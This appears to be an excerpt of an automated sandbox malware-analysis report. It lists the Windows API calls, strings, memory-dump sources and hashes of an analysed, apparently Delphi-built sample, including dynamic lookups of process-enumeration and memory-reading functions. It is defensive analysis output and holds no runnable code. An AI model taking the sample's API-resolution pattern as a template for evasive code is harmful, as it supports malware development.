                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2982266575-0
APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 02AF4C3F
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
APIs
• SysFreeString.OLEAUT32(00000000), ref: 02AF4C57
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02AF1A03,?,02AF1FC1), ref: 02AF15E2
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02AF1FC1), ref: 02AF16A4
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02AF1FE4), ref: 02AF1704
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B0ADA3,?,?,02B0AE35,00000000,02B0AF11), ref: 02B0AB30
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B0AB48
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B0AB5A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B0AB6C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B0AB7E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B0AB90
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B0ABA2
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B0ABB4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B0ABC6
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B0ABD8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B0ABEA
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B0ABFC
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B0AC0E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B0AC20
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B0AC32
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B0AC44
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B0AC56
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 667068680-597814768
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,02AF6C14,02AF0000,02B1E790), ref: 02AF5925
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02AF593C
• lstrcpynA.KERNEL32(?,?,?), ref: 02AF596C
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02AF6C14,02AF0000,02B1E790), ref: 02AF59D0
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02AF6C14,02AF0000,02B1E790), ref: 02AF5A06
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02AF6C14,02AF0000,02B1E790), ref: 02AF5A19
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02AF6C14,02AF0000,02B1E790), ref: 02AF5A2B
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02AF6C14,02AF0000,02B1E790), ref: 02AF5A37
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02AF6C14,02AF0000), ref: 02AF5A6B
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02AF6C14), ref: 02AF5A77
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02AF5A99
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameA$\$kernel32.dll
• API String ID: 3245196872-1565342463
• Opcode ID: 758e4dbe59ef641d696c1ef06df6dad322056f1a96f8139ca2f7e6abf9ce3df1
• Instruction ID: d6629623d6efc0439144b85a284e5b073c4a2578b38681123fd01b5e21108034
• Opcode Fuzzy Hash: 758e4dbe59ef641d696c1ef06df6dad322056f1a96f8139ca2f7e6abf9ce3df1
• Instruction Fuzzy Hash: BB416D71D40219ABDB50EBE8CDC8ADEB7BDAF08340F4445A5B648E7241EB389B448F54
APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02AF5BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02AF5BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02AF5BFB
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02AF5C26
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02AF5C6D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02AF5C7D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02AF5CA5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02AF5CB5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02AF5CDB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02AF5CEB
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
• Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
• Instruction ID: 46fb7769dd409c020892dade5b73c83e50e8f1491ba17335c146a65d9ded5de9
• Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
• Instruction Fuzzy Hash: DC318471E4026C6AEB65D7F48C85BDEB7ED9B04384F4401A1B709E6181EE789A858FA0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02AF7FF5
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02AFA7E2
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• GetVersionExA.KERNEL32(?,02B1D106,00000000,02B1D11E), ref: 02AFB79A
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02AFBE72,00000000,02AFC08B,?,?,00000000,00000000), ref: 02AFA823
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 481472006-0
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02AFD29D
  • Part of subcall function 02AFD268: GetProcAddress.KERNEL32(00000000), ref: 02AFD281
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
• API String ID: 1646373207-1918263038
APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B06EDE
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B06EEF
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B06EFF
• GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B06F0F
• GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B06F1F
• GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B06F2F
• GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B06F3F
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
• API String ID: 667068680-2233174745
APIs
• MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02AF28CE
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: Message
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
• API String ID: 2030045667-32948583
Strings
• The unexpected small block leaks are:, xrefs: 02AF2707
• , xrefs: 02AF2814
• Unexpected Memory Leak, xrefs: 02AF28C0
• 7, xrefs: 02AF26A1
• An unexpected memory leak has occurred. , xrefs: 02AF2690
• The sizes of unexpected leaked medium and large blocks are: , xrefs: 02AF2849
• bytes: , xrefs: 02AF275D
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID:
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
• API String ID: 0-2723507874
APIs
• GetThreadLocale.KERNEL32(00000000,02AFC08B,?,?,00000000,00000000), ref: 02AFBDF6
  • Part of subcall function 02AFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02AFA7E2
Strings
Similarity
• API ID: Locale$InfoThread
• String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 4232894706-2493093252
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02B0B000
• GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B0B017
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02B0B0AB
• IsBadReadPtr.KERNEL32(?,00000002), ref: 02B0B0B7
• IsBadReadPtr.KERNEL32(?,00000014), ref: 02B0B0CB
Strings
Similarity
• API ID: Read$HandleModule
• String ID: KernelBase$LoadLibraryExA
• API String ID: 2226866862-113032527
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02AF4423,?,?,02B767C8,?,?,02B1E7A8,02AF65B1,02B1D30D), ref: 02AF4395
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02AF4423,?,?,02B767C8,?,?,02B1E7A8,02AF65B1,02B1D30D), ref: 02AF439B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,02AF43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02AF4423,?,?,02B767C8), ref: 02AF43B0
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,02AF43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02AF4423,?,?), ref: 02AF43B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02AF43D4
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ae4b2e21ae5fc8275c9b6897c63662a720e04bb28f3eb935f304241dead3bcc1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4044a8615fc60bca7bf29c599898b032378673231d09ff742ec85dd127a9477d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae4b2e21ae5fc8275c9b6897c63662a720e04bb28f3eb935f304241dead3bcc1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF0BB61AD4344B5F650A3E06D46F5A277C5B49F52F500B89F764950D0DFAC80DC4719
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02AFAD59
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02AFAD7D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFAD3C: GetModuleFileNameA.KERNEL32(02AF0000,?,00000105), ref: 02AFAD98
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02AFAE2E
                                                                                                                                                                                                                                                                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 02AFAEFB
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02AFAF18
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02AFAF1E
